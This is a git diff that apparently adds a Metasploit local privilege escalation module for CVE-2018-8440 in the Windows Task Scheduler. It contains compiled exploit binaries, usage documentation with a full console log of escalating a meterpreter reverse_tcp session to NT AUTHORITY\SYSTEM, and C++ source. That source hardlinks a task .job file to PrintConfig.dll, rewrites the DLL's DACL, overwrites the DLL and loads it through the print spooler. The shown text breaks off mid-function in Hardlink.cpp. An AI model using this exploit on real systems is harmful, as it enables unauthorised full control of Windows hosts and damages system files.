diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll
new file mode 100755
index 0000000000..482ee17d14
Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.dll differ
diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp
new file mode 100755
index 0000000000..9ffc5edc10
Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.exp differ
diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib
new file mode 100755
index 0000000000..5c68391ac7
Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.lib differ
diff --git a/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb
new file mode 100755
index 0000000000..903d74c36c
Binary files /dev/null and b/data/exploits/CVE-2018-8440/ALPC-TaskSched-LPE.pdb differ
diff --git a/documentation/modules/exploit/windows/local/alpc_taskscheduler.md b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
new file mode 100644
index 0000000000..d6d2921812
--- /dev/null
+++ b/documentation/modules/exploit/windows/local/alpc_taskscheduler.md
@@ -0,0 +1,89 @@
+## Description
+
+On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented by the task scheduler service can be used to write arbitrary DACLs to `.job` files located in `c:\windows\tasks` because the scheduler does not use impersonation when checking this location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be created to a file the user has read access to. After creating a hardlink, the vulnerability can be triggered to set the DACL on the linked file.
+
+WARNING:
+The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
+will be overwritten when the exploit runs.
+
+This module has been tested against Windows 10 Pro x64.
+
+## Vulnerable Application
+
+Affected Windows OS versions and related patch details can be found in the [Microsoft Advisory for CVE-2018-8440](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440).
+
+## Verification Steps
+
+* Get a meterpreter session on Windows 10 x64
+* `use exploit/windows/local/alpc_taskscheduler`
+* `set session <session>`
+* `set payload <payload>`
+* `set lhost <lhost>`
+* `run`
+* Get a session as SYSTEM
+
+## Scenarios
+
+### Tested on Windows 10 Pro Version 1803 x64
+
+```
+msf5 > use exploit/windows/local/alpc_taskscheduler
+msf5 exploit(windows/local/alpc_taskscheduler) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(windows/local/alpc_taskscheduler) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(windows/local/alpc_taskscheduler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                                                       Connection
+  --  ----  ----                     -----------                                                                       ----------
+  1         shell x64/windows        Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. Al...  172.22.222.136:4444 -> 172.22.222.200:50490 (172.22.222.200)
+  2         meterpreter x64/windows  DESKTOP-IPOGIJR\lowmsfdev @ DESKTOP-IPOGIJR                                       172.22.222.136:4444 -> 172.22.222.200:50491 (172.22.222.200)
+
+msf5 exploit(windows/local/alpc_taskscheduler) > set session 1
+session => 1
+msf5 exploit(windows/local/alpc_taskscheduler) > exploit
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[-] Exploit aborted due to failure: none: Only meterpreter sessions are supported
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/local/alpc_taskscheduler) > set session 2
+session => 2
+msf5 exploit(windows/local/alpc_taskscheduler) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Checking target...
+[*] Target Looks Good... trying to start notepad.exe
+[*] Launching notepad.exe to host the exploit...
+[+] Process 6140 launched.
+[*] Writing payload dll into process 6140 memory
+[*] Reflectively injecting the exploit DLL into 6140...
+[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
+[*] Sending stage (206403 bytes) to 172.22.222.200
+[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:50492) at 2018-09-21 12:28:00 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-IPOGIJR
+OS              : Windows 10 (Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 3
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 3...
+msf5 exploit(windows/local/alpc_taskscheduler) > set session 3
+session => 3
+msf5 exploit(windows/local/alpc_taskscheduler) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Checking target...
+[-] Exploit aborted due to failure: none: Session is already elevated
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/local/alpc_taskscheduler) >
+```
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE.sln b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE.sln
new file mode 100755
index 0000000000..e2045c638c
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE.sln
@@ -0,0 +1,41 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.40629.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ALPC-TaskSched-LPE", "ALPC-TaskSched-LPE\ALPC-TaskSched-LPE.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|ARM = Debug|ARM
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|ARM = Release|ARM
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|ARM.ActiveCfg = Debug|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.ActiveCfg = Debug|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|Win32.Build.0 = Debug|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|ARM.ActiveCfg = Release|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.ActiveCfg = Release|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|Win32.Build.0 = Release|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32
+		{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD}
+	EndGlobalSection
+EndGlobal
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
new file mode 100755
index 0000000000..b081e10b76
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp
@@ -0,0 +1,151 @@
+//***************************************************************//
+// Windows LPE - Non-admin/Guest to system - by SandboxEscaper   //
+//***************************************************************//
+
+/* _SchRpcSetSecurity which is part of the task scheduler ALPC endpoint allows us to set an arbitrary DACL.
+It will Set the security of a file in c:\windows\tasks without impersonating, a non-admin (works from Guest too) user can write here.
+Before the task scheduler writes the DACL we can create a hard link to any file we have read access over.
+This will result in an arbitrary DACL write.
+This PoC will overwrite a printer related dll and use it as a hijacking vector. This is ofcourse one of many options to abuse this.*/
+
+#include "stdafx.h"
+#include "rpc_h.h"
+#include <xpsprint.h>
+#include <fstream>
+#pragma comment(lib, "rpcrt4.lib")
+using namespace std;
+
+//extern "C" __declspec (dllexport) DWORD CALLBACK ExploitThread(LPVOID);
+
+RPC_STATUS CreateBindingHandle(RPC_BINDING_HANDLE *binding_handle)
+{
+	RPC_STATUS status;
+	RPC_BINDING_HANDLE v5;
+	RPC_SECURITY_QOS SecurityQOS = {};
+	RPC_WSTR StringBinding = nullptr;
+	RPC_BINDING_HANDLE Binding;
+
+	StringBinding = 0;
+	Binding = 0;
+	status = RpcStringBindingComposeW(L"c8ba73d2-3d55-429c-8e9a-c44f006f69fc", L"ncalrpc",
+		nullptr, nullptr, nullptr, &StringBinding);
+	if (status == RPC_S_OK)
+	{
+		status = RpcBindingFromStringBindingW(StringBinding, &Binding);
+		RpcStringFreeW(&StringBinding);
+		if (!status)
+		{
+			SecurityQOS.Version = 1;
+			SecurityQOS.ImpersonationType = RPC_C_IMP_LEVEL_IMPERSONATE;
+			SecurityQOS.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
+			SecurityQOS.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
+
+			status = RpcBindingSetAuthInfoExW(Binding, 0, 6u, 0xAu, 0, 0, (RPC_SECURITY_QOS*)&SecurityQOS);
+			if (!status)
+			{
+				v5 = Binding;
+				Binding = 0;
+				*binding_handle = v5;
+			}
+		}
+	}
+
+	if (Binding)
+		RpcBindingFree(&Binding);
+	return status;
+}
+
+extern "C" void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len)
+{
+	return(malloc(len));
+}
+
+extern "C" void __RPC_USER midl_user_free(void __RPC_FAR * ptr)
+{
+	free(ptr);
+}
+
+bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname);
+
+void RunExploit()
+{
+	RPC_BINDING_HANDLE handle;
+	RPC_STATUS status = CreateBindingHandle(&handle);
+
+	//These two functions will set the DACL on an arbitrary file (see hardlink in main), change the security descriptor string parameters if needed.	
+	_SchRpcCreateFolder(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
+	_SchRpcSetSecurity(handle, L"UpdateTask", L"D:(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)(A;;0x1301bf;;;AU)(A;OICIIO;SDGXGWGR;;;AU)(A;;0x1200a9;;;BU)(A;OICIIO;GXGR;;;BU)", 0);
+}
+
+int mainf(LPVOID lpReserved)
+{
+	//We enumerate the path of PrintConfig.dll, which we will write the DACL of and overwrite to hijack the print spooler service
+	//You might want to expand this code block with FindNextFile .. as there may be multiple prnms003.inf_amd64* folders since older versions do not get cleaned up it in some rare cases.
+	//When this happens this code has no garantuee that it will target the dll that ends up getting loaded... and you really want to avoid this.
+	WIN32_FIND_DATA FindFileData;
+	HANDLE hFind;
+	wchar_t searchLoc[MAX_PATH], prntCnfg[MAX_PATH];
+	UINT szPath = 0, szPath1 = 0;
+	szPath = GetSystemDirectory(searchLoc, MAX_PATH);
+	szPath1 = GetSystemDirectory(prntCnfg, MAX_PATH);
+	if (szPath == 0 || szPath1 == 0){
+		return (-1);
+	}
+	wcscat(searchLoc, L"\\DriverStore\\FileRepository\\prnms003.inf_amd64*");
+	wcscat(prntCnfg, L"\\DriverStore\\FileRepository\\");
+
+	hFind = FindFirstFile(searchLoc, &FindFileData);
+	wchar_t PrinterDriverFolder[MAX_PATH];
+	wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll";
+	wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName));
+	FindClose(hFind);
+	wcscat(prntCnfg, PrinterDriverFolder);
+	wcscat(prntCnfg, EndPath);
+
+	//Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of
+	wchar_t jobPath[MAX_PATH];
+	szPath = GetSystemWindowsDirectory(jobPath, MAX_PATH);
+	if (szPath == 0){
+		return (-1);
+	}
+	wcscat(jobPath, L"\\tasks\\UpdateTask.job");
+	CreateNativeHardlink(jobPath, prntCnfg);
+	RunExploit();
+
+	MEMORY_BASIC_INFORMATION lpBuffer;
+	VirtualQuery(lpReserved, &lpBuffer, sizeof(MEMORY_BASIC_INFORMATION));
+
+	//We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue
+	HANDLE hFile;
+	DWORD dwBytesWritten = 0;
+	do {
+		hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+		WriteFile(hFile, (char*)lpBuffer.AllocationBase, (DWORD)lpBuffer.RegionSize, &dwBytesWritten, NULL);
+		if (hFile == INVALID_HANDLE_VALUE)
+		{
+			Sleep(5000);
+		}
+	} while (hFile == INVALID_HANDLE_VALUE);
+	CloseHandle(hFile);
+
+	//After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
+	CoInitialize(nullptr);
+	IXpsOMObjectFactory *xpsFactory = NULL;
+	CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast<LPVOID*>(&xpsFactory));
+	HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
+	IXpsPrintJob *job = NULL;
+	IXpsPrintJobStream *jobStream = NULL;
+
+	StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL);
+
+	// jobStream->Close();
+	CoUninitialize();
+	return 0;
+}
+
+DWORD CALLBACK ExploitThread(LPVOID lpReserved)
+{
+	mainf(lpReserved);
+	FreeLibraryAndExitThread(GetModuleHandle(NULL), 0);
+	return 0;
+}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters
new file mode 100755
index 0000000000..671ba85fd6
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.filters
@@ -0,0 +1,55 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ntimports.h">
+      <Filter>Source Files</Filter>
+    </ClInclude>
+    <ClInclude Include="resource.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="rpc_h.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="PocStorSvc.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="rpc_c.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="Hardlink.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="dllmain.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <Midl Include="rpc.idl">
+      <Filter>Source Files</Filter>
+    </Midl>
+  </ItemGroup>
+  <ItemGroup>
+    <ResourceCompile Include="Resource.rc" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="..\x64\Release\exploit.dll" />
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj
new file mode 100755
index 0000000000..46a021173f
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.vcxproj
@@ -0,0 +1,174 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>15.0</VCProjectVersion>
+    <ProjectGuid>{E75DCF6C-9B6D-49C8-96D7-0003C127B449}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>Poc_StorSvc</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0.16299.0</WindowsTargetPlatformVersion>
+    <ProjectName>ALPC-TaskSched-LPE</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v141</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v141</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v141</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+    <IncludePath>..\..\..\..\ReflectiveDLLInjection\common;$(IncludePath)</IncludePath>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <PrecompiledHeader>NotUsing</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>false</SDLCheck>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>xpsprint.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="..\..\..\..\ReflectiveDLLInjection\common\ReflectiveDLLInjection.h" />
+    <ClInclude Include="..\..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.h" />
+    <ClInclude Include="ntimports.h" />
+    <ClInclude Include="rpc_h.h" />
+    <ClInclude Include="stdafx.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="..\..\..\..\ReflectiveDLLInjection\dll\src\ReflectiveLoader.c" />
+    <ClCompile Include="ALPC-TaskSched-LPE.cpp" />
+    <ClCompile Include="dllmain.cpp" />
+    <ClCompile Include="Hardlink.cpp" />
+    <ClCompile Include="rpc_c.c">
+      <RuntimeLibrary Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">MultiThreadedDLL</RuntimeLibrary>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">NotUsing</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <Midl Include="rpc.idl" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp
new file mode 100755
index 0000000000..3d53d5f319
--- /dev/null
+++ b/external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/Hardlink.cpp
@@ -0,0 +1,106 @@
+//  Copyright 2015 Google Inc. All Rights Reserved.
+//
+//  Licensed under the Apache License, Version 2.0 (the "License");
+//  you may not use this file except in compliance with the License.
+//  You may obtain a copy of the License at
+//
+//  http ://www.apache.org/licenses/LICENSE-2.0
+//
+//  Unless required by applicable law or agreed to in writing, software
+//  distributed under the License is distributed on an "AS IS" BASIS,
+//  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//  See the License for the specific language governing permissions and
+//  limitations under the License.
+
+#include "stdafx.h"
+#include "ntimports.h"
+#include "typed_buffer.h"
+#include <string>
+
+std::wstring BuildFullPath(const std::wstring& path, bool native)
+{
+	std::wstring ret;
+	WCHAR buf[MAX_PATH];
+
+	if (native)
+	{
+		ret = L"\\??\\";
+	}
+
+	if (GetFullPathName(path.c_str(), MAX_PATH, buf, nullptr) > 0)
+	{
+		ret += buf;
+	}
+	else
+	{
+		ret += path;
+	}
+
+	return ret;
+}
+
+FARPROC GetProcAddressNT(LPCSTR lpName)
+{
+	return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
+}
+
+HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
+{
+	UNICODE_STRING name = { 0 };
+	OBJECT_ATTRIBUTES obj_attr = { 0 };
+
+	DEFINE_NTDLL(RtlInitUnicodeString);
+	DEFINE_NTDLL(NtOpenFile);
+
+	if (path)
+	{
+		fRtlInitUnicodeString(&name, path);
+		InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
+	}
+	else
+	{
+		InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
+	}
+
+	HANDLE h = nullptr;
+	IO_STATUS_BLOCK io_status = { 0 };
+	NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
+	if (NT_SUCCESS(status))
+	{
+		return h;
+	}
+	else
+	{
+		return nullptr;
+	}
+}
+
+bool CreateNativeHardlink(LPCWSTR linkname, LPCWSTR targetname)
+{
+	std::wstring full_linkname = BuildFullPath(linkname, true);
+	size_t len = full_linkname.size() * sizeof(WCHAR);
+
